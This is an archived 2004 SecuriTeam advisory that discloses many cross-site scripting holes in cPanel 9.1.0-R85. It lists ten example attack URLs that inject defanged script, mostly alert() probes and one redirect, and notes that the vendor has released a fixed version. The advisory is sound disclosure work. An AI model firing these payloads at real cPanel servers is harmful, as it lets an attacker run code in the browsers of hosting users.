[UNIX] Multiple Cross-Site Scripting Vulnerabilities In cPanel

From: SecuriTeam (support_at_securiteam.com)
Date: 04/05/04

  • Next message: SecuriTeam: "[UNIX] TexUtil Symlink Vulnerability (texutil.log)"
    To: list@securiteam.com
    Date: 5 Apr 2004 13:53:14 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Multiple Cross-Site Scripting Vulnerabilities In cPanel
    ------------------------------------------------------------------------

    SUMMARY

    With both
    <http://www.cpanel.net/realindex.html?from=http://www.cpanel.net/docs.htm>
    cPanel and WebHost Manager, "you and your clients will be in control of
    every aspect of the Web Hosting World. With an administrator interface
    through WebHost Manager, and an end user interface through cPanel, every
    part of your hosting operations is covered".

    cPanel suffers from an extensive amount of XSS vulnerabilities in almost
    every variable returned to the user's browser.

    DETAILS

    Vulnerable Systems:
     * cPanel version 9.1.0-R85

    Immune Systems:
     * cPanel 2004 EDGE release

    Many variables in cPanel are prone to XSS attacks and are not properly
    filtered. This could easily lead to code execution inside the victim's
    browser using the trust relationship between the browser and the server.
    cPanel supports filtering of HTML and scripts in input variables but
    according to cPanel the feature was not enabled in order to support
    third-party themes.

    Examples of XSS attacks on cPanel:
    http://[victim]/frontend/x/cpanelpro/ignorelist.html?account="><scr!pt>alert('Vulnerable')</scr!pt>
    http://[victim]/frontend/x/cpanelpro/showlog.html?account=<scr!pt>alert('Vulnerable')</scr!pt>
    http://[victim]/frontend/x/sql/repairdb.html?db=<scr!pt>alert('Vulnerable')</scr!pt>
    http://[victim]/frontend/x/ftp/doaddftp.html?login="><scr!pt>alert('Vulnerable')</scr!pt>
    http://[victim]/frontend/x/cpanelpro/editmsg.html?account="><scr!pt>alert('Vulnerable')</scr!pt>
    http://[victim]/frontend/x/testfile.html?email=<scr!pt>alert('Vulnerable')</scr!pt>
    http://[victim]/frontend/x2/err/erredit.html?dir=public_html/&file=<scr!pt>alert('Vulnerable')</scr!pt>
    http://[victim]/frontend/x2/net/dnslook.html?dns=</pre><scr!pt>window.location='http://www.cirt.net/'</scr!pt>
    http://[victim]/frontend/x2/denyip/del.html?ip=<scr!pt>alert('Vulnerable')</scr!pt>
    http://[victim]/frontend/x2/htaccess/index.html?dir=<scr!pt>alert('Vulnerable')</scr!pt>

    Note: The SCRIPT tag has been replace with SCR!PT.

    Vendor Status:
    The vendor was contacted on 3/13/2004. A new version is available which is
    immune to the vulnerabilities.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:sullo@cirt.net>
    sullo@cirt.net.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[UNIX] TexUtil Symlink Vulnerability (texutil.log)"

    Relevant Pages

    • [UNIX] cPanel mod_phpsuexec Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The options used by cPanel ... user owning a web accessible PHP file. ... vulnerability and it has been repaired. ...
      (Securiteam)
    • [NEWS] Gecko based browsers Stack Corruption
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lack of proper length and value checking allow attacker to cause a buffer ... * Netscape Browser version 8.0.3.3 ...
      (Securiteam)
    • [TOOL] cPanel Multiple Vulnerabilities Testing Script
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... administrators to verify whether their cPanel system is vulnerable to ... # PURPOSE: Detect possible vulnerabilities ... # For secure cpanel hosting, ...
      (Securiteam)
    • [NEWS] Netscape Concurrency-related Memory Corruption Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Netscape Concurrency-related Memory Corruption Vulnerability ... A vulnerability in Netscape browser allows remote attackers to corrupt the ...
      (Securiteam)
    • [UNIX] cPanel Local Privilege Escalation
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A file execution precedence vulnerability in cPanel allows local privilege ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)